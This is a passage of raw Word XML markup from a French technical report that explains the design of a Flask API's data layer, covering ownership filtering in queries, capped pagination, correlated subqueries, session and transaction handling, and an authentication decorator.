                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="4c6b1b805460-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3272578" cy="1189664"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le point important est que la propriété est une</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">condition de la requête</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, pas une vérification faite après lecture. Deux conséquences : il est impossible d'oublier le contrôle sans supprimer la ligne qui sélectionne, et l'objet chargé en mémoire est toujours légitime. Le choix du</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">au lieu du</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>est expliqué en § 5.7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le même motif s'applique au rattachement à un dossier, via un unique prédicat réutilisé aux trois endroits qui en ont besoin (création, mise à jour, filtrage de liste) :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3948005" cy="688699"/>
            <wp:docPr id="45" name="Picture 45"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="bf7b19680705-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3948005" cy="688699"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sans ce contrôle, un utilisateur pourrait ranger son document dans le dossier d'un autre en devinant un identifiant — une écriture dans le périmètre d'autrui, plus grave qu'une lecture.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="100"/>
    <w:bookmarkStart w:id="101" w:name="X5e78f3461edb8c4477feae73f890da7cc88d9b2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pagination côté serveur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4816519" cy="1489397"/>
            <wp:docPr id="46" name="Picture 46"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cd8e26206787-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4816519" cy="1489397"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">per_page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">est borné à 50.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sans plafond, un appel avec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">per_page=100000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ferait charger toute la table en mémoire et sérialiser l'intégralité des contenus Markdown : un déni de service à moindre frais, déclenché par un simple paramètre d'URL. Les bornes sont validées avant toute requête.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le filtre est appliqué aux deux requêtes.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le total et la page doivent porter sur le même ensemble, sinon la pagination affiche un nombre de pages qui ne correspond pas au contenu. Construire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">stmt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">count_stmt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en parallèle, à partir de la même base, rend l'oubli visible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le tri par</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">updated_at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">desc s'appuie sur l'index composite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document (user_id, updated_at)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(§ 5.4) : le SGBD n'a ni à trier ni à parcourir la table.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="101"/>
    <w:bookmarkStart w:id="102" w:name="X6eed81c27562e52ec73c9c4793fef7206e48414"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Agrégations du back-office : sous-requêtes corrélées</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'écran d'administration affiche, pour chaque compte, son nombre de documents et son nombre d'appels IA. Le réflexe serait deux jointures et un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GROUP BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; le code emploie deux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sous-requêtes corrélées</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2355856" cy="2091423"/>
            <wp:docPr id="47" name="Picture 47"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="1e823ddaa776-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2355856" cy="2091423"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La raison est un piège classique du SQL :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">deux jointures un-à-plusieurs sur la même table produisent un produit cartésien.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un utilisateur avec 3 documents et 10 appels IA générerait 30 lignes, et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">COUNT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">renverrait 30 et 30 au lieu de 3 et 10. Les corriger demanderait</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">COUNT(DISTINCT …)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, plus coûteux et moins lisible. Les sous-requêtes corrélées évitent le problème par construction : chacune est évaluée indépendamment pour chaque ligne de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Elles évitent aussi un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GROUP BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sur toutes les colonnes de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— fragile, puisqu'il faudrait le compléter à chaque ajout de colonne. Le coût est une évaluation par ligne retournée, acceptable ici parce que la pagination borne ce nombre à 50.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Les statistiques globales, elles, sont de simples comptages sur fenêtre glissante, cohérents avec le mécanisme de quota (§ 5.7) :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4430534" cy="488721"/>
            <wp:docPr id="48" name="Picture 48"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="96e39ca14010-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4430534" cy="488721"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="102"/>
    <w:bookmarkStart w:id="104" w:name="X2e8e0f4133678b5856a0ce2259ac1faad95b312"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Gestion de la session de base de données</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chaque route ouvre sa session avec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">with SessionLocal() as db_session:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— un gestionnaire de contexte, jamais une session globale. La session est donc fermée même en cas d'exception, et deux requêtes concurrentes ne partagent pas d'état.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">expire_on_commit=False</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est positionné sur la fabrique pour que les objets restent lisibles après le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">commit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ce qui permet de les sérialiser sans recharger la ligne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">commit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est toujours la dernière opération du bloc, après l'ensemble des contrôles. Le cas le plus significatif est l'inscription, où l'utilisateur et son consentement doivent être créés ensemble :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3320787" cy="889282"/>
            <wp:docPr id="49" name="Picture 49"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="a72f2963d0dd-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3320787" cy="889282"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flush()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est ce qui rend la transaction possible : il attribue l'UUID sans valider, de sorte que le consentement peut référencer l'utilisateur avant que celui-ci soit définitivement écrit. Sans lui, il faudrait deux transactions successives — et un compte pourrait exister sans consentement enregistré si la seconde échouait, ce que la relation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">«include»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>du § 5.6 interdit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3657A88A" w14:textId="5E1C6D94" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00690DDD" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc198828320"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Des</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> extraits de code d’autres composants</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trois composants transverses ne relèvent ni du métier ni de la persistance, mais conditionnent la sécurité de toute l'API : le décorateur d'authentification, la vérification du rôle administrateur, et la pose du cookie de session.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="104"/>
    <w:bookmarkStart w:id="105" w:name="Xc2a8a0cf0bac5855fa2bf91a51f014e537eba34"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Le décorateur d'authentification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3465540" cy="1490383"/>
            <wp:docPr id="50" name="Picture 50"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="bc7bb9330e5a-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3465540" cy="1490383"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3465540" cy="1490383"/>
            <wp:docPr id="51" name="Picture 51"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="bc7bb9330e5a-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3465540" cy="1490383"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">@wraps(f)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">n'est pas un détail de style.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sans lui, toutes les vues décorées porteraient le nom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">decorated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et Flask refuserait d'enregistrer la deuxième route rencontrée — le nom de la fonction lui sert de clé d'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. L'erreur est déroutante quand on ne connaît pas le mécanisme.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le message d'erreur ne distingue pas un jeton expiré d'un jeton invalide.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">decode_access_token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lève bien deux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ValueError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">distinctes, mais la route les fusionne : préciser « expiré » confirmerait à un attaquant que sa signature était valide. Le client, lui, n'a pas besoin de la nuance — dans les deux cas il tente un rafraîchissement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">request.user_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sert de canal entre le décorateur et la vue.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L'identifiant est attaché à l'objet de requête courant, propre à chaque requête : il n'y a pas de risque de fuite entre deux appels concurrents. Toutes les requêtes de la couche données le lisent depuis là, jamais depuis le corps de la requête — un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
